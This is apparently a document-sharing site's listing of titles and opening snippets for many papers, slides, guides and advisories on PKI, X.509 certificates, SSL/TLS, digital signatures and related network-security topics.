Online signature API Version 0.20, 2015-04-08 Terms used in this document Onnistuu.fi, the website https://www.onnistuu.fi/ Client, online page or other system using the API provided by Onnistuu.fi. End
Chapter 4. Authentication Applications. COSC 490 Network Security Annie Lu 1
Chapter 4 Authentication Applications COSC 490 Network Security Annie Lu 1 OUTLINE Kerberos X.509 Authentication Service COSC 490 Network Security Annie Lu 2 Authentication Applications authentication
Digital Certificates (Public Key Infrastructure) Reshma Afshar Indiana State University
Digital Certificates (Public Key Infrastructure) Reshma Afshar Indiana State University October 2015 1 List of Figures Contents 1 Introduction 1 2 History 2 3 Public Key Infrastructure (PKI) 3 3.1 Certificate
How to generate SSL certificates for use with a KVM box & XViewer with XCA v0.9.3
How to generate SSL certificates for use with a KVM box & XViewer with XCA v0.9.3 Written by Michael Lackner aka Grand Admiral Thrawn http://wp.xin.at/the-xviewer-project irc://www.xin.at:6666 #guests
Security Analysis of PLAID
Security Analysis of PLAID Dai Watanabe 1 Yokoyama Laboratory, Hitachi, Ltd., 292 Yoshida-cho, Totsuka-ku, Yokohama, 244-0817, Japan [email protected] Abstract. PLAID is a mutual authentication
SSL Report: ebfl.srpskabanka.rs (91.240.6.48)
Home Projects Qualys.com Contact You are here: Home > Projects > SSL Server Test > SSL Report: (91.240.6.48) Assessed on: Sun, 03 Jan 2016 15:46:07 UTC HIDDEN Clear cache Scan Another» Summary Overall
Certificate Management. PAN-OS Administrator s Guide. Version 7.0
Certificate Management PAN-OS Administrator s Guide Version 7.0 Contact Information Corporate Headquarters: Palo Alto Networks 4401 Great America Parkway Santa Clara, CA 95054 www.paloaltonetworks.com/company/contact-us
Network Security Essentials Chapter 7
Network Security Essentials Chapter 7 Fourth Edition by William Stallings Lecture slides by Lawrie Brown Chapter 7 Electronic Mail Security Despite the refusal of VADM Poindexter and LtCol North to appear,
Configuration Guide for RFMS 3.0 Initial Configuration. WiNG 5 How-To Guide. Digital Certificates. July 2011 Revision 1.0
Configuration Guide for RFMS 3.0 Initial Configuration XXX-XXXXXX-XX WiNG 5 How-To Guide Digital Certificates July 2011 Revision 1.0 MOTOROLA and the Stylized M Logo are registered in the US Patent & Trademark
Authentication Applications
Authentication Applications CSCI 454/554 Authentication Applications will consider authentication functions developed to support application-level authentication & digital signatures Kerberos a symmetric-key
How To Encrypt Data With Encryption
USING ENCRYPTION TO PROTECT SENSITIVE INFORMATION Commonwealth Office of Technology Security Month Seminars Alternate Title? Boy, am I surprised. The Entrust guy who has mentioned PKI during every Security
Practice Questions. CS161 Computer Security, Fall 2008
Practice Questions CS161 Computer Security, Fall 2008 Name Email address Score % / 100 % Please do not forget to fill up your name, email in the box in the midterm exam you can skip this here. These practice
PAdES signatures in itext and the road ahead. Paulo Soares
PAdES signatures in itext and the road ahead Paulo Soares About the speaker Paulo Soares M.Sc. Electronics and Telecomunications Hardware background in military comunication systems Works for www.glintt.com
Prepared By: P0209337 Lichen. P0209259 Xulu
Local Certificate Authority Prepared By: P0209337 Lichen P0209259 Xulu 1 2 Abstract Today, security of information is most important in the Internet; for example, electronic commerce and electronic government
Public Key Infrastructure
Public Key Infrastructure A cheezy Man-in-the-Middle attack hack [email protected] @okoeroo Graphics: Real Time Monito Gidon Moont, Imperial College London, see http://gridportal.hep.ph.ic.ac.uk/rtm Particle
Chapter 6 Electronic Mail Security
Cryptography and Network Security Chapter 6 Electronic Mail Security Lectured by Nguyễn Đức Thái Outline Pretty Good Privacy S/MIME 2 Electronic Mail Security In virtually all distributed environments,
Cryptography and Network Security Chapter 14. Key Distribution. Key Management and Distribution. Key Distribution Task 4/19/2010
Cryptography and Network Security Chapter 14 Fifth Edition by William Stallings Lecture slides by Lawrie Brown Chapter 14 Key Management and Distribution No Singhalese, whether man or woman, would venture
DEPARTMENT OF DEFENSE PUBLIC KEY INFRASTRUCTURE EXTERNAL CERTIFICATION AUTHORITY MASTER TEST PLAN VERSION 1.0
DEFENSE INFORMATION SYSTEMS AGENCY JOINT INTEROPERABILITY TEST COMMAND FORT HUACHUCA, ARIZONA DEPARTMENT OF DEFENSE PUBLIC KEY INFRASTRUCTURE EXTERNAL CERTIFICATION AUTHORITY MASTER TEST PLAN VERSION 1.0
OpenADR 2.0 Security. Jim Zuber, CTO QualityLogic, Inc.
OpenADR 2.0 Security Jim Zuber, CTO QualityLogic, Inc. Security Overview Client and server x.509v3 certificates TLS 1.2 with SHA256 ECC or RSA cipher suites TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256 TLS_RSA_WITH_AES_128_CBC_SHA256
A PKI case study: Implementing the Server-based Certificate Validation Protocol
54 ISBN: 978-960-474-048-2 A PKI case study: Implementing the Server-based Certificate Validation Protocol MARIUS MARIAN University of Craiova Department of Automation ROMANIA [email protected] EUGEN
Pre-authentication XXE vulnerability in the Services Drupal module
Pre-authentication XXE vulnerability in the Services Drupal module Security advisory 24/04/2015 Renaud Dubourguais www.synacktiv.com 14 rue Mademoiselle 75015 Paris 1. Vulnerability description 1.1. The
AD Image Encryption. Format Version 1.2
AD Image Encryption Format Version 1.2 17 May 2010 Table of Contents Introduction... 3 Overview... 3 Image Formats... 4 Keys... 4 Credentials... 4 Certificates... 4 Image Key encryption... 5 Appendix A
Network Working Group. October 1990
Network Working Group Request for Comments: 1186 R. Rivest MIT Laboratory for Computer Science October 1990 The MD4 Message Digest Algorithm Status of this Memo This RFC is the specification of the MD4
Visa Smart Debit/Credit Certificate Authority Public Keys
CHIP AND NEW TECHNOLOGIES Visa Smart Debit/Credit Certificate Authority Public Keys Overview The EMV standard calls for the use of Public Key technology for offline authentication, for aspects of online
A Security Flaw in the X.509 Standard Santosh Chokhani CygnaCom Solutions, Inc. Abstract
A Security Flaw in the X509 Standard Santosh Chokhani CygnaCom Solutions, Inc Abstract The CCITT X509 standard for public key certificates is used to for public key management, including distributing them
Factory Application Certificates and Keys Products: SB700EX, SB70LC
Factory Application Certificates and Keys Products: SB700EX, SB70LC 1 Contents 1 Overview... 3 2 Certificates and Keys... 3 2.1 What is in a Certificate?... 4 3 SSL Certificates and Keys... 6 3.1 NetBurner
What Your Mother Didn't Tell You About PEM, DER, PKCS. Eric Norman University of Wisconsin-Madison
What Your Mother Didn't Tell You About PEM, DER, PKCS Eric Norman University of Wisconsin-Madison 1 Audience I'm nuts Some of you might want to bolt Who needs to know? Developers Support personnel diagnose
Caml Virtual Machine File & data formats Document version: 1.4 http://cadmium.x9c.fr
Caml Virtual Machine File & data formats Document version: 1.4 http://cadmium.x9c.fr Copyright c 2007-2010 Xavier Clerc [email protected] Released under the LGPL version 3 February 6, 2010 Abstract: This
Cryptography and Network Security Chapter 15
Cryptography and Network Security Chapter 15 Fourth Edition by William Stallings Lecture slides by Lawrie Brown Chapter 15 Electronic Mail Security Despite the refusal of VADM Poindexter and LtCol North
Faking Extended Validation SSL Certificates in Internet Explorer 7
Page 1 of 11 Faking Extended Validation SSL Certificates in Internet Explorer 7 June 7 th 2007, V1.1 Martin Christinat, CTO, [email protected] Abstract Extended Validation (EV) SSL certificates are a new
Authentication requirement Authentication function MAC Hash function Security of
UNIT 3 AUTHENTICATION Authentication requirement Authentication function MAC Hash function Security of hash function and MAC SHA HMAC CMAC Digital signature and authentication protocols DSS Slides Courtesy
Encrypted Connections
EMu Documentation Encrypted Connections Document Version 1 EMu Version 4.0.03 www.kesoftware.com 2010 KE Software. All rights reserved. Contents SECTION 1 Encrypted Connections 1 How it works 2 Requirements
Overview. SSL Cryptography Overview CHAPTER 1
CHAPTER 1 Note The information in this chapter applies to both the ACE module and the ACE appliance unless otherwise noted. The features in this chapter apply to IPv4 and IPv6 unless otherwise noted. Secure
Ciphermail S/MIME Setup Guide
CIPHERMAIL EMAIL ENCRYPTION Ciphermail S/MIME Setup Guide September 23, 2014, Rev: 6882 Copyright 2008-2014, ciphermail.com. CONTENTS CONTENTS Contents 1 Introduction 3 2 S/MIME 3 2.1 PKI...................................
Introduction to Computer Security
Introduction to Computer Security Hash Functions and Digital Signatures Pavel Laskov Wilhelm Schickard Institute for Computer Science Integrity objective in a wide sense Reliability Transmission errors
Public Key Infrastructure (PKI)
Public Key Infrastructure (PKI) In this video you will learn the quite a bit about Public Key Infrastructure and how it is used to authenticate clients and servers. The purpose of Public Key Infrastructure
NIST Test Personal Identity Verification (PIV) Cards
NISTIR 7870 NIST Test Personal Identity Verification (PIV) Cards David A. Cooper http://dx.doi.org/10.6028/nist.ir.7870 NISTIR 7870 NIST Text Personal Identity Verification (PIV) Cards David A. Cooper
Digital Signatures. Murat Kantarcioglu. Based on Prof. Li s Slides. Digital Signatures: The Problem
Digital Signatures Murat Kantarcioglu Based on Prof. Li s Slides Digital Signatures: The Problem Consider the real-life example where a person pays by credit card and signs a bill; the seller verifies
MTAT.07.017 Applied Cryptography
MTAT.07.017 Applied Cryptography Public Key Infrastructure (PKI) Public Key Certificates (X.509) University of Tartu Spring 2015 1 / 42 The hardest problem Key Management How to obtain the key of the other
SSO Eurécia. and external Applications. Purpose
SSO Eurécia Purpose This document describes the way to manage SSO connection and external applications. The users logged to the external application by entering his credentials then access to Eurécia without
PHP Magic Tricks: Type Juggling. PHP Magic Tricks: Type Juggling
Who Am I Chris Smith (@chrismsnz) Previously: Polyglot Developer - Python, PHP, Go + more Linux Sysadmin Currently: Pentester, Consultant at Insomnia Security Little bit of research Insomnia Security Group
Displaying SSL Certificate and Key Pair Information
CHAPTER6 Displaying SSL Certificate and Key Pair Information This chapter describes how to use the available show commands to display SSL-related information, such as the certificate and key pair files
Secure Socket Layer (SSL) and Transport Layer Security (TLS)
Secure Socket Layer (SSL) and Transport Layer Security (TLS) Raj Jain Washington University in Saint Louis Saint Louis, MO 63130 [email protected] Audio/Video recordings of this lecture are available
Netzwerksicherheit Übung 6 SSL/TLS, OpenSSL
Netzwerksicherheit Übung 6 SSL/TLS, Thomas Schneider Computer Networks and Communication Systems Dept. of Computer Sciences, University of Erlangen-Nuremberg, Germany 10. 14.12.2007 Thomas Schneider: Netzwerksicherheit
Detailed Specifications
1 of 6 Appendix Detailed Specifications 1. Standards The following standards are used in the document under the following abbreviations: - BASE32, BASE64, BASE64-URL: Network Working Group: Request for
X.509 and SSL. A look into the complex world of X.509 and SSL http://www.phildev.net/ssl/ UUASC 07/05/07. Phil Dibowitz http://www.phildev.
X.509 and SSL A look into the complex world of X.509 and SSL http://www.phildev.net/ssl/ UUASC 07/05/07 Phil Dibowitz http://www.phildev.net/ The Outline Introduction of concepts X.509 SSL End-User Notes
mod_ssl Cryptographic Techniques
mod_ssl Overview Reference The nice thing about standards is that there are so many to choose from. And if you really don t like all the standards you just have to wait another year until the one arises
Network Security Technology Network Management
COMPUTER NETWORKS Network Security Technology Network Management Source Encryption E(K,P) Decryption D(K,C) Destination The author of these slides is Dr. Mark Pullen of George Mason University. Permission
Fighting product clones through digital signatures
Paul Curtis, Katrin Berkenkopf Embedded Experts Team, SEGGER Microcontroller Fighting product clones through digital signatures Product piracy and forgery are growing problems that not only decrease turnover
X.509 Certificate Generator User Manual
X.509 Certificate Generator User Manual Introduction X.509 Certificate Generator is a tool that allows you to generate digital certificates in PFX format, on Microsoft Certificate Store or directly on
APNIC Trial of Certification of IP Addresses and ASes
APNIC Trial of Certification of IP Addresses and ASes RIPE 51 11 October 2005 Geoff Huston 1 Address and Routing Security What we have today is a relatively insecure system that is vulnerable to various
Digital Signatures. Meka N.L.Sneha. Indiana State University. [email protected]. October 2015
Digital Signatures Meka N.L.Sneha Indiana State University [email protected] October 2015 1 Introduction Digital Signatures are the most trusted way to get documents signed online. A digital
Symmetric and Public-key Crypto Due April 14 2015, 11:59PM
CMSC 414 (Spring 2015) 1 Symmetric and Public-key Crypto Due April 14 2015, 11:59PM Updated April 11: see Piazza for a list of errata. Sections 1 4 are Copyright c 2006-2011 Wenliang Du, Syracuse University.
Project #2: Secure Email System Due: Tues, November 29 th in class
Project #2: Secure Email System Due: Tues, November 29 th in class (CAETE students may email their project to Martin) As advertised, in this project you will provide a secure email system for use within
XML Encryption Syntax and Processing. Duan,Limiao 07,12,2006
XML Encryption Syntax and Processing Duan,Limiao 07,12,2006 Agenda Introduction Encryption Overview and Examples - An XML Element - XML Element Content (Elements) - XML Element Content (Character Data)
Certificates and network security
Certificates and network security Tuomas Aura CSE-C3400 Information security Aalto University, autumn 2014 Outline X.509 certificates and PKI Network security basics: threats and goals Secure socket layer
Chapter 17. Transport-Level Security
Chapter 17 Transport-Level Security Web Security Considerations The World Wide Web is fundamentally a client/server application running over the Internet and TCP/IP intranets The following characteristics
Cryptographic hash functions and MACs Solved Exercises for Cryptographic Hash Functions and MACs
Cryptographic hash functions and MACs Solved Exercises for Cryptographic Hash Functions and MACs Enes Pasalic University of Primorska Koper, 2014 Contents 1 Preface 3 2 Problems 4 2 1 Preface This is a
ETSI TS 102 280 V1.1.1 (2004-03)
TS 102 280 V1.1.1 (2004-03) Technical Specification X.509 V.3 Certificate Profile for Certificates Issued to Natural Persons 2 TS 102 280 V1.1.1 (2004-03) Reference DTS/ESI-000018 Keywords electronic signature,
SMPTE Standards Transition Issues for NIST/FIPS Requirements v1.1
SMPTE Standards Transition Issues for NIST/FIPS Requirements v1.1 Contents 2010.8.23 DRM inside, Taehyun Kim ETRI, Kisoon Yoon 1 Introduction NIST (National Institute of Standards and Technology) published
INTERNATIONAL TELECOMMUNICATION UNION
INTERNATIONAL TELECOMMUNICATION UNION ITU-T X.690 TELECOMMUNICATION STANDARDIZATION SECTOR OF ITU (07/2002) SERIES X: DATA NETWORKS AND OPEN SYSTEM COMMUNICATIONS OSI networking and system aspects Abstract
Understanding Digital Certificates on z/os Vanguard Las Vegas, NV Session AST3 June 26th 2012
Understanding Digital Certificates on z/os Vanguard Las Vegas, NV Session AST3 June 26th 2012 Wai Choi, CISSP IBM Corporation RACF/PKI Development & Design Poughkeepsie, NY e-mail: [email protected] 1 Trademarks
SSL Report: okidirect.co.uk (84.18.207.58)
Home Projects Qualys.com Contact You are here: Home > Projects > SSL Server Test > okidirect.co.uk SSL Report: okidirect.co.uk (84.18.207.58) Assessed on: Fri, 26 Jun 2015 12:51:45 UTC HIDDEN Clear cache
Using IKEv2 on Juniper Networks Junos Pulse Secure Access Appliance
Using IKEv2 on Juniper Networks Junos Pulse Secure Access Appliance Juniper Networks, Inc. 1 Table of Contents Before we begin... 3 Configuring IKEv2 on IVE... 3 IKEv2 Client Side Configuration on Windows
Understanding Digital Certificates on z/os Share Anaheim, CA Session 8349 March 2nd 2011
Understanding Digital Certificates on z/os Share Anaheim, CA Session 8349 March 2nd 2011 Wai Choi, CISSP IBM Corporation RACF/PKI Development & Design Poughkeepsie, NY e-mail: [email protected] 1 Trademarks
Brocade Engineering. PKI Tutorial. Jim Kleinsteiber. February 6, 2002. Page 1
PKI Tutorial Jim Kleinsteiber February 6, 2002 Page 1 Outline Public Key Cryptography Refresher Course Public / Private Key Pair Public-Key Is it really yours? Digital Certificate Certificate Authority
